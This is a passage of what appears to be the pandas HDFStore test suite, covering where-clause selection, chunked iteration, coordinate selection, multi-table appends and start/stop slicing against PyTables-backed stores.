# with a data column, but different columns
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['A'])
result = store.select('df', ['A > 0'], columns=['C', 'D'])
expected = df[df.A > 0].reindex(columns=['C', 'D'])
tm.assert_frame_equal(expected, result)
def test_select_dtypes(self):
with ensure_clean_store(self.path) as store:
# with a Timestamp data column (GH #2637)
df = DataFrame(dict(
ts=bdate_range('2012-01-01', periods=300),
A=np.random.randn(300)))
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['ts', 'A'])
result = store.select('df', "ts>=Timestamp('2012-02-01')")
expected = df[df.ts >= Timestamp('2012-02-01')]
tm.assert_frame_equal(expected, result)
# bool columns (GH #2849)
df = DataFrame(np.random.randn(5, 2), columns=['A', 'B'])
df['object'] = 'foo'
df.loc[4:5, 'object'] = 'bar'
df['boolv'] = df['A'] > 0
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
expected = (df[df.boolv == True] # noqa
.reindex(columns=['A', 'boolv']))
for v in [True, 'true', 1]:
result = store.select('df', 'boolv == %s' % str(v),
columns=['A', 'boolv'])
tm.assert_frame_equal(expected, result)
expected = (df[df.boolv == False] # noqa
.reindex(columns=['A', 'boolv']))
for v in [False, 'false', 0]:
result = store.select(
'df', 'boolv == %s' % str(v), columns=['A', 'boolv'])
tm.assert_frame_equal(expected, result)
# integer index
df = DataFrame(dict(A=np.random.rand(20), B=np.random.rand(20)))
_maybe_remove(store, 'df_int')
store.append('df_int', df)
result = store.select(
'df_int', "index<10 and columns=['A']")
expected = df.reindex(index=list(df.index)[0:10], columns=['A'])
tm.assert_frame_equal(expected, result)
# float index
df = DataFrame(dict(A=np.random.rand(
20), B=np.random.rand(20), index=np.arange(20, dtype='f8')))
_maybe_remove(store, 'df_float')
store.append('df_float', df)
result = store.select(
'df_float', "index<10.0 and columns=['A']")
expected = df.reindex(index=list(df.index)[0:10], columns=['A'])
tm.assert_frame_equal(expected, result)
with ensure_clean_store(self.path) as store:
# floats w/o NaN
df = DataFrame(
dict(cols=range(11), values=range(11)), dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
store.append('df1', df, data_columns=True)
result = store.select(
'df1', where='values>2.0')
expected = df[df['values'] > 2.0]
tm.assert_frame_equal(expected, result)
# floats with NaN
df.iloc[0] = np.nan
expected = df[df['values'] > 2.0]
store.append('df2', df, data_columns=True, index=False)
result = store.select(
'df2', where='values>2.0')
tm.assert_frame_equal(expected, result)
# https://github.com/PyTables/PyTables/issues/282
# bug in selection when 0th row has a np.nan and an index
# store.append('df3',df,data_columns=True)
# result = store.select(
# 'df3', where='values>2.0')
# tm.assert_frame_equal(expected, result)
# not in first position float with NaN ok too
df = DataFrame(
dict(cols=range(11), values=range(11)), dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
df.iloc[1] = np.nan
expected = df[df['values'] > 2.0]
store.append('df4', df, data_columns=True)
result = store.select(
'df4', where='values>2.0')
tm.assert_frame_equal(expected, result)
# test selection with comparison against numpy scalar
# GH 11283
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
expected = df[df['A'] > 0]
store.append('df', df, data_columns=True)
np_zero = np.float64(0) # noqa
result = store.select('df', where=["A>np_zero"])
tm.assert_frame_equal(expected, result)
def test_select_with_many_inputs(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(ts=bdate_range('2012-01-01', periods=300),
A=np.random.randn(300),
B=range(300),
users=['a'] * 50 + ['b'] * 50 + ['c'] * 100 +
['a%03d' % i for i in range(100)]))
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['ts', 'A', 'B', 'users'])
# regular select
result = store.select('df', "ts>=Timestamp('2012-02-01')")
expected = df[df.ts >= Timestamp('2012-02-01')]
tm.assert_frame_equal(expected, result)
# small selector
result = store.select(
'df',
"ts>=Timestamp('2012-02-01') & users=['a','b','c']")
expected = df[(df.ts >= Timestamp('2012-02-01')) &
df.users.isin(['a', 'b', 'c'])]
tm.assert_frame_equal(expected, result)
# big selector along the columns
selector = ['a', 'b', 'c'] + ['a%03d' % i for i in range(60)]
result = store.select(
'df',
"ts>=Timestamp('2012-02-01') and users=selector")
expected = df[(df.ts >= Timestamp('2012-02-01')) &
df.users.isin(selector)]
tm.assert_frame_equal(expected, result)
selector = range(100, 200)
result = store.select('df', 'B=selector')
expected = df[df.B.isin(selector)]
tm.assert_frame_equal(expected, result)
assert len(result) == 100
# big selector along the index
selector = Index(df.ts[0:100].values)
result = store.select('df', 'ts=selector')
expected = df[df.ts.isin(selector.values)]
tm.assert_frame_equal(expected, result)
assert len(result) == 100
def test_select_iterator(self):
# single table
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame(500)
_maybe_remove(store, 'df')
store.append('df', df)
expected = store.select('df')
results = [s for s in store.select('df', iterator=True)]
result = concat(results)
tm.assert_frame_equal(expected, result)
results = [s for s in store.select('df', chunksize=100)]
assert len(results) == 5
result = concat(results)
tm.assert_frame_equal(expected, result)
results = [s for s in store.select('df', chunksize=150)]
result = concat(results)
tm.assert_frame_equal(result, expected)
with ensure_clean_path(self.path) as path:
df = tm.makeTimeDataFrame(500)
df.to_hdf(path, 'df_non_table')
pytest.raises(TypeError, read_hdf, path,
'df_non_table', chunksize=100)
pytest.raises(TypeError, read_hdf, path,
'df_non_table', iterator=True)
with ensure_clean_path(self.path) as path:
df = tm.makeTimeDataFrame(500)
df.to_hdf(path, 'df', format='table')
results = [s for s in read_hdf(path, 'df', chunksize=100)]
result = concat(results)
assert len(results) == 5
tm.assert_frame_equal(result, df)
tm.assert_frame_equal(result, read_hdf(path, 'df'))
# multiple
with ensure_clean_store(self.path) as store:
df1 = tm.makeTimeDataFrame(500)
store.append('df1', df1, data_columns=True)
df2 = tm.makeTimeDataFrame(500).rename(
columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
store.append('df2', df2)
df = concat([df1, df2], axis=1)
# full selection
expected = store.select_as_multiple(
['df1', 'df2'], selector='df1')
results = [s for s in store.select_as_multiple(
['df1', 'df2'], selector='df1', chunksize=150)]
result = concat(results)
tm.assert_frame_equal(expected, result)
def test_select_iterator_complete_8014(self):
# GH 8014
# using iterator and where clause
chunksize = 1e4
# no iterator
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[-1]
# select w/o iteration and no where clause works
result = store.select('df')
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, single term, begin
# of range, works
where = "index >= '%s'" % beg_dt
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, single term, end
# of range, works
where = "index <= '%s'" % end_dt
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, inclusive range,
# works
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# with iterator, full range
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[-1]
# select w/iterator and no where clause works
results = [s for s in store.select('df', chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
def test_select_iterator_non_complete_8014(self):
# GH 8014
# using iterator and where clause
chunksize = 1e4
# with iterator, non complete range
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[1]
end_dt = expected.index[-2]
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index >= beg_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index <= end_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[(expected.index >= beg_dt) &
(expected.index <= end_dt)]
tm.assert_frame_equal(rexpected, result)
# with iterator, empty where
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
end_dt = expected.index[-1]
# select w/iterator and where clause, single term, begin of range
where = "index > '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
assert 0 == len(results)
def test_select_iterator_many_empty_frames(self):
# GH 8014
# using iterator and where clause can return many empty
# frames.
chunksize = int(1e4)
# with iterator, range limited to the first chunk
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100000, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[chunksize - 1]
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index >= beg_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
assert len(results) == 1
result = concat(results)
rexpected = expected[expected.index <= end_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
# should be 1, is 10
assert len(results) == 1
result = concat(results)
rexpected = expected[(expected.index >= beg_dt) &
(expected.index <= end_dt)]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause which selects
# *nothing*.
#
# To be consistent with Python idiom I suggest this should
# return [] e.g. `for e in []: print True` never prints
# True.
where = "index <= '%s' & index >= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
# should be []
assert len(results) == 0
def test_retain_index_attributes(self):
# GH 3499, losing frequency info on index recreation
df = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2000-1-1', periods=3, freq='H'))))
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'data')
store.put('data', df, format='table')
result = store.get('data')
tm.assert_frame_equal(df, result)
for attr in ['freq', 'tz', 'name']:
for idx in ['index', 'columns']:
assert (getattr(getattr(df, idx), attr, None) ==
getattr(getattr(result, idx), attr, None))
# try to append a table with a different frequency
with catch_warnings(record=True):
df2 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1',
periods=3, freq='D'))))
store.append('data', df2)
assert store.get_storer('data').info['index']['freq'] is None
# this is ok
_maybe_remove(store, 'df2')
df2 = DataFrame(dict(
A=Series(lrange(3),
index=[Timestamp('20010101'), Timestamp('20010102'),
Timestamp('20020101')])))
store.append('df2', df2)
df3 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1', periods=3,
freq='D'))))
store.append('df2', df3)
def test_retain_index_attributes2(self):
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
df = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2000-1-1',
periods=3, freq='H'))))
df.to_hdf(path, 'data', mode='w', append=True)
df2 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1', periods=3,
freq='D'))))
df2.to_hdf(path, 'data', append=True)
idx = date_range('2000-1-1', periods=3, freq='H')
idx.name = 'foo'
df = DataFrame(dict(A=Series(lrange(3), index=idx)))
df.to_hdf(path, 'data', mode='w', append=True)
assert read_hdf(path, 'data').index.name == 'foo'
with catch_warnings(record=True):
idx2 = date_range('2001-1-1', periods=3, freq='H')
idx2.name = 'bar'
df2 = DataFrame(dict(A=Series(lrange(3), index=idx2)))
df2.to_hdf(path, 'data', append=True)
assert read_hdf(path, 'data').index.name is None
def test_panel_select(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
store.put('wp', wp, format='table')
date = wp.major_axis[len(wp.major_axis) // 2]
crit1 = ('major_axis>=date')
crit2 = ("minor_axis=['A', 'D']")
result = store.select('wp', [crit1, crit2])
expected = wp.truncate(before=date).reindex(minor=['A', 'D'])
assert_panel_equal(result, expected)
result = store.select(
'wp', ['major_axis>="20000124"',
("minor_axis=['A', 'B']")])
expected = wp.truncate(
before='20000124').reindex(minor=['A', 'B'])
assert_panel_equal(result, expected)
def test_frame_select(self):
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
date = df.index[len(df) // 2]
crit1 = Term('index>=date')
assert crit1.env.scope['date'] == date
crit2 = ("columns=['A', 'D']")
crit3 = ('columns=A')
result = store.select('frame', [crit1, crit2])
expected = df.loc[date:, ['A', 'D']]
tm.assert_frame_equal(result, expected)
result = store.select('frame', [crit3])
expected = df.loc[:, ['A']]
tm.assert_frame_equal(result, expected)
# invalid terms
df = tm.makeTimeDataFrame()
store.append('df_time', df)
pytest.raises(
ValueError, store.select, 'df_time', "index>0")
# can't select if not written as table
# store['frame'] = df
# pytest.raises(ValueError, store.select,
# 'frame', [crit1, crit2])
def test_frame_select_complex(self):
# select via complex criteria
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[df.index[0:4], 'string'] = 'bar'
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', data_columns=['string'])
# empty
result = store.select('df', 'index>df.index[3] & string="bar"')
expected = df.loc[(df.index > df.index[3]) & (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
result = store.select('df', 'index>df.index[3] & string="foo"')
expected = df.loc[(df.index > df.index[3]) & (df.string == 'foo')]
tm.assert_frame_equal(result, expected)
# or
result = store.select('df', 'index>df.index[3] | string="bar"')
expected = df.loc[(df.index > df.index[3]) | (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
result = store.select('df', '(index>df.index[3] & '
'index<=df.index[6]) | string="bar"')
expected = df.loc[((df.index > df.index[3]) & (
df.index <= df.index[6])) | (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
# invert
result = store.select('df', 'string!="bar"')
expected = df.loc[df.string != 'bar']
tm.assert_frame_equal(result, expected)
# invert not implemented in numexpr :(
pytest.raises(NotImplementedError,
store.select, 'df', '~(string="bar")')
# invert ok for filters
result = store.select('df', "~(columns=['A','B'])")
expected = df.loc[:, df.columns.difference(['A', 'B'])]
tm.assert_frame_equal(result, expected)
# in
result = store.select(
'df', "index>df.index[3] & columns in ['A','B']")
expected = df.loc[df.index > df.index[3]].reindex(columns=[
'A', 'B'])
tm.assert_frame_equal(result, expected)
def test_frame_select_complex2(self):
with ensure_clean_path(['parms.hdf', 'hist.hdf']) as paths:
pp, hh = paths
# use non-trivial selection criteria
parms = DataFrame({'A': [1, 1, 2, 2, 3]})
parms.to_hdf(pp, 'df', mode='w',
format='table', data_columns=['A'])
selection = read_hdf(pp, 'df', where='A=[2,3]')
hist = DataFrame(np.random.randn(25, 1),
columns=['data'],
index=MultiIndex.from_tuples(
[(i, j) for i in range(5)
for j in range(5)],
names=['l1', 'l2']))
hist.to_hdf(hh, 'df', mode='w', format='table')
expected = read_hdf(hh, 'df', where='l1=[2, 3, 4]')
# sccope with list like
l = selection.index.tolist() # noqa
store = HDFStore(hh)
result = store.select('df', where='l1=l')
assert_frame_equal(result, expected)
store.close()
result = read_hdf(hh, 'df', where='l1=l')
assert_frame_equal(result, expected)
# index
index = selection.index # noqa
result = read_hdf(hh, 'df', where='l1=index')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=selection.index')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=selection.index.tolist()')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=list(selection.index)')
assert_frame_equal(result, expected)
# sccope with index
store = HDFStore(hh)
result = store.select('df', where='l1=index')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=selection.index')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=selection.index.tolist()')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=list(selection.index)')
assert_frame_equal(result, expected)
store.close()
def test_invalid_filtering(self):
# can't use more than one filter (atm)
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table')
# not implemented
pytest.raises(NotImplementedError, store.select,
'df', "columns=['A'] | columns=['B']")
# in theory we could deal with this
pytest.raises(NotImplementedError, store.select,
'df', "columns=['A','B'] & columns=['C']")
def test_string_select(self):
# GH 2973
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
# test string ==/!=
df['x'] = 'none'
df.loc[2:7, 'x'] = ''
store.append('df', df, data_columns=['x'])
result = store.select('df', 'x=none')
expected = df[df.x == 'none']
assert_frame_equal(result, expected)
try:
result = store.select('df', 'x!=none')
expected = df[df.x != 'none']
assert_frame_equal(result, expected)
except Exception as detail:
pprint_thing("[{0}]".format(detail))
pprint_thing(store)
pprint_thing(expected)
df2 = df.copy()
df2.loc[df2.x == '', 'x'] = np.nan
store.append('df2', df2, data_columns=['x'])
result = store.select('df2', 'x!=none')
expected = df2[isna(df2.x)]
assert_frame_equal(result, expected)
# int ==/!=
df['int'] = 1
df.loc[2:7, 'int'] = 2
store.append('df3', df, data_columns=['int'])
result = store.select('df3', 'int=2')
expected = df[df.int == 2]
assert_frame_equal(result, expected)
result = store.select('df3', 'int!=2')
expected = df[df.int != 2]
assert_frame_equal(result, expected)
def test_read_column(self):
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df)
# error
pytest.raises(KeyError, store.select_column, 'df', 'foo')
def f():
store.select_column('df', 'index', where=['index>5'])
pytest.raises(Exception, f)
# valid
result = store.select_column('df', 'index')
tm.assert_almost_equal(result.values, Series(df.index).values)
assert isinstance(result, Series)
# not a data indexable column
pytest.raises(
ValueError, store.select_column, 'df', 'values_block_0')
# a data column
df2 = df.copy()
df2['string'] = 'foo'
store.append('df2', df2, data_columns=['string'])
result = store.select_column('df2', 'string')
tm.assert_almost_equal(result.values, df2['string'].values)
# a data column with NaNs, result excludes the NaNs
df3 = df.copy()
df3['string'] = 'foo'
df3.loc[4:6, 'string'] = np.nan
store.append('df3', df3, data_columns=['string'])
result = store.select_column('df3', 'string')
tm.assert_almost_equal(result.values, df3['string'].values)
# start/stop
result = store.select_column('df3', 'string', start=2)
tm.assert_almost_equal(result.values, df3['string'].values[2:])
result = store.select_column('df3', 'string', start=-2)
tm.assert_almost_equal(result.values, df3['string'].values[-2:])
result = store.select_column('df3', 'string', stop=2)
tm.assert_almost_equal(result.values, df3['string'].values[:2])
result = store.select_column('df3', 'string', stop=-2)
tm.assert_almost_equal(result.values, df3['string'].values[:-2])
result = store.select_column('df3', 'string', start=2, stop=-2)
tm.assert_almost_equal(result.values, df3['string'].values[2:-2])
result = store.select_column('df3', 'string', start=-2, stop=2)
tm.assert_almost_equal(result.values, df3['string'].values[-2:2])
# GH 10392 - make sure column name is preserved
df4 = DataFrame({'A': np.random.randn(10), 'B': 'foo'})
store.append('df4', df4, data_columns=True)
expected = df4['B']
result = store.select_column('df4', 'B')
tm.assert_series_equal(result, expected)
def test_coordinates(self):
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df)
# all
c = store.select_as_coordinates('df')
assert((c.values == np.arange(len(df.index))).all())
# get coordinates back & test vs frame
_maybe_remove(store, 'df')
df = DataFrame(dict(A=lrange(5), B=lrange(5)))
store.append('df', df)
c = store.select_as_coordinates('df', ['index<3'])
assert((c.values == np.arange(3)).all())
result = store.select('df', where=c)
expected = df.loc[0:2, :]
tm.assert_frame_equal(result, expected)
c = store.select_as_coordinates('df', ['index>=3', 'index<=4'])
assert((c.values == np.arange(2) + 3).all())
result = store.select('df', where=c)
expected = df.loc[3:4, :]
tm.assert_frame_equal(result, expected)
assert isinstance(c, Index)
# multiple tables
_maybe_remove(store, 'df1')
_maybe_remove(store, 'df2')
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
store.append('df1', df1, data_columns=['A', 'B'])
store.append('df2', df2)
c = store.select_as_coordinates('df1', ['A>0', 'B>0'])
df1_result = store.select('df1', c)
df2_result = store.select('df2', c)
result = concat([df1_result, df2_result], axis=1)
expected = concat([df1, df2], axis=1)
expected = expected[(expected.A > 0) & (expected.B > 0)]
tm.assert_frame_equal(result, expected)
# pass array/mask as the coordinates
with ensure_clean_store(self.path) as store:
df = DataFrame(np.random.randn(1000, 2),
index=date_range('20000101', periods=1000))
store.append('df', df)
c = store.select_column('df', 'index')
where = c[DatetimeIndex(c).month == 5].index
expected = df.iloc[where]
# locations
result = store.select('df', where=where)
tm.assert_frame_equal(result, expected)
# boolean
result = store.select('df', where=where)
tm.assert_frame_equal(result, expected)
# invalid
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df), dtype='float64'))
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df) + 1))
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df)), start=5)
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df)), start=5, stop=10)
# selection with filter
selection = date_range('20000101', periods=500)
result = store.select('df', where='index in selection')
expected = df[df.index.isin(selection)]
tm.assert_frame_equal(result, expected)
# list
df = DataFrame(np.random.randn(10, 2))
store.append('df2', df)
result = store.select('df2', where=[0, 3, 5])
expected = df.iloc[[0, 3, 5]]
tm.assert_frame_equal(result, expected)
# boolean
where = [True] * 10
where[-2] = False
result = store.select('df2', where=where)
expected = df.loc[where]
tm.assert_frame_equal(result, expected)
# start/stop
result = store.select('df2', start=5, stop=10)
expected = df[5:10]
tm.assert_frame_equal(result, expected)
def test_append_to_multiple(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# exceptions
pytest.raises(ValueError, store.append_to_multiple,
{'df1': ['A', 'B'], 'df2': None}, df,
selector='df3')
pytest.raises(ValueError, store.append_to_multiple,
{'df1': None, 'df2': None}, df, selector='df3')
pytest.raises(
ValueError, store.append_to_multiple, 'df1', df, 'df1')
# regular operation
store.append_to_multiple(
{'df1': ['A', 'B'], 'df2': None}, df, selector='df1')
result = store.select_as_multiple(
['df1', 'df2'], where=['A>0', 'B>0'], selector='df1')
expected = df[(df.A > 0) & (df.B > 0)]
tm.assert_frame_equal(result, expected)
def test_append_to_multiple_dropna(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df1.iloc[1, df1.columns.get_indexer(['A', 'B'])] = np.nan
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# dropna=True should guarantee rows are synchronized
store.append_to_multiple(
{'df1': ['A', 'B'], 'df2': None}, df, selector='df1',
dropna=True)
result = store.select_as_multiple(['df1', 'df2'])
expected = df.dropna()
tm.assert_frame_equal(result, expected)
tm.assert_index_equal(store.select('df1').index,
store.select('df2').index)
@pytest.mark.xfail(run=False,
reason="append_to_multiple_dropna_false "
"is not raising as failed")
def test_append_to_multiple_dropna_false(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df1.iloc[1, df1.columns.get_indexer(['A', 'B'])] = np.nan
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# dropna=False shouldn't synchronize row indexes
store.append_to_multiple(
{'df1a': ['A', 'B'], 'df2a': None}, df, selector='df1a',
dropna=False)
with pytest.raises(ValueError):
store.select_as_multiple(['df1a', 'df2a'])
assert not store.select('df1a').index.equals(
store.select('df2a').index)
def test_select_as_multiple(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
with ensure_clean_store(self.path) as store:
# no tables stored
pytest.raises(Exception, store.select_as_multiple,
None, where=['A>0', 'B>0'], selector='df1')
store.append('df1', df1, data_columns=['A', 'B'])
store.append('df2', df2)
# exceptions
pytest.raises(Exception, store.select_as_multiple,
None, where=['A>0', 'B>0'], selector='df1')
pytest.raises(Exception, store.select_as_multiple,
[None], where=['A>0', 'B>0'], selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df1', 'df3'], where=['A>0', 'B>0'],
selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df3'], where=['A>0', 'B>0'], selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df1', 'df2'], where=['A>0', 'B>0'],
selector='df4')
# default select
result = store.select('df1', ['A>0', 'B>0'])
expected = store.select_as_multiple(
['df1'], where=['A>0', 'B>0'], selector='df1')
tm.assert_frame_equal(result, expected)
expected = store.select_as_multiple(
'df1', where=['A>0', 'B>0'], selector='df1')
tm.assert_frame_equal(result, expected)
# multiple
result = store.select_as_multiple(
['df1', 'df2'], where=['A>0', 'B>0'], selector='df1')
expected = concat([df1, df2], axis=1)
expected = expected[(expected.A > 0) & (expected.B > 0)]
tm.assert_frame_equal(result, expected)
# multiple (diff selector)
result = store.select_as_multiple(
['df1', 'df2'], where='index>df2.index[4]', selector='df2')
expected = concat([df1, df2], axis=1)
expected = expected[5:]
tm.assert_frame_equal(result, expected)
# test excpection for diff rows
store.append('df3', tm.makeTimeDataFrame(nper=50))
pytest.raises(ValueError, store.select_as_multiple,
['df1', 'df3'], where=['A>0', 'B>0'],
selector='df1')
@pytest.mark.skipif(
LooseVersion(tables.__version__) < LooseVersion('3.1.0'),
reason=("tables version does not support fix for nan selection "
"bug: GH 4858"))
def test_nan_selection_bug_4858(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(cols=range(6), values=range(6)),
dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
df.iloc[0] = np.nan
expected = DataFrame(dict(cols=['13.0', '14.0', '15.0'], values=[
3., 4., 5.]), index=[3, 4, 5])
# write w/o the index on that particular column
store.append('df', df, data_columns=True, index=['cols'])
result = store.select('df', where='values>2.0')
assert_frame_equal(result, expected)
def test_start_stop_table(self):
with ensure_clean_store(self.path) as store:
# table
df = DataFrame(dict(A=np.random.rand(20), B=np.random.rand(20)))
store.append('df', df)
result = store.select(
'df', "columns=['A']", start=0, stop=5)
expected = df.loc[0:4, ['A']]
tm.assert_frame_equal(result, expected)
# out of range
result = store.select(
'df', "columns=['A']", start=30, stop=40)
assert len(result) == 0
expected = df.loc[30:40, ['A']]
tm.assert_frame_equal(result, expected)
def test_start_stop_multiple(self):
# GH 16209
with ensure_clean_store(self.path) as store:
df = DataFrame({"foo": [1, 2], "bar": [1, 2]})
store.append_to_multiple({'selector': ['foo'], 'data': None}, df,
selector='selector')
result = store.select_as_multiple(['selector', 'data'],
selector='selector', start=0,
stop=1)
expected = df.loc[[0], ['foo', 'bar']]
tm.assert_frame_equal(result, expected)
def test_start_stop_fixed(self):
with ensure_clean_store(self.path) as store:
# fixed, GH 8287
df = DataFrame(dict(A=np.random.rand(20),
B=np.random.rand(20)),
index=pd.date_range('20130101', periods=20))
store.put('df', df)
result = store.select(
'df', start=0, stop=5)
expected = df.iloc[0:5, :]
tm.assert_frame_equal(result, expected)
result = store.select(
'df', start=5, stop=10)
expected = df.iloc[5:10, :]
tm.assert_frame_equal(result, expected)
# out of range
result = store.select(
'df', start=30, stop=40)
expected = df.iloc[30:40, :]
tm.assert_frame_equal(result, expected)
# series
s = df.A
store.put('s', s)
result = store.select('s', start=0, stop=5)
expected = s.iloc[0:5]
tm.assert_series_equal(result, expected)
result = store.select('s', start=5, stop=10)
expected = s.iloc[5:10]
tm.assert_series_equal(result, expected)
# sparse; not implemented
df = tm.makeDataFrame()
df.iloc[3:5, 1:3] = np.nan
df.iloc[8:10, -2] = np.nan
dfs = df.to_sparse()
store.put('dfs', dfs)
with pytest.raises(NotImplementedError):
store.select('dfs', start=0, stop=5)
def test_select_filter_corner(self):
df = DataFrame(np.random.randn(50, 100))
df.index = ['%.3d' % c for c in df.index]
df.columns = ['%.3d' % c for c in df.columns]
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
crit = 'columns=df.columns[:75]'
result = store.select('frame', [crit])
tm.assert_frame_equal(result, df.loc[:, df.columns[:75]])
crit = 'columns=df.columns[:75:2]'
result = store.select('frame', [crit])
tm.assert_frame_equal(result, df.loc[:, df.columns[:75:2]])
def test_path_pathlib(self):
df = tm.makeDataFrame()
result = tm.round_trip_pathlib(
lambda p: df.to_hdf(p, 'df'),
lambda p: pd.read_hdf(p, 'df'))
tm.assert_frame_equal(df, result)
@pytest.mark.parametrize('start, stop', [(0, 2), (1, 2), (None, None)])
def test_contiguous_mixed_data_table(self, start, stop):
# GH 17021
# ValueError when reading a contiguous mixed-data table ft. VLArray
df = DataFrame({'a': Series([20111010, 20111011, 20111012]),
'b': Series(['ab', 'cd', 'ab'])})
with ensure_clean_store(self.path) as store:
store.append('test_dataset', df)
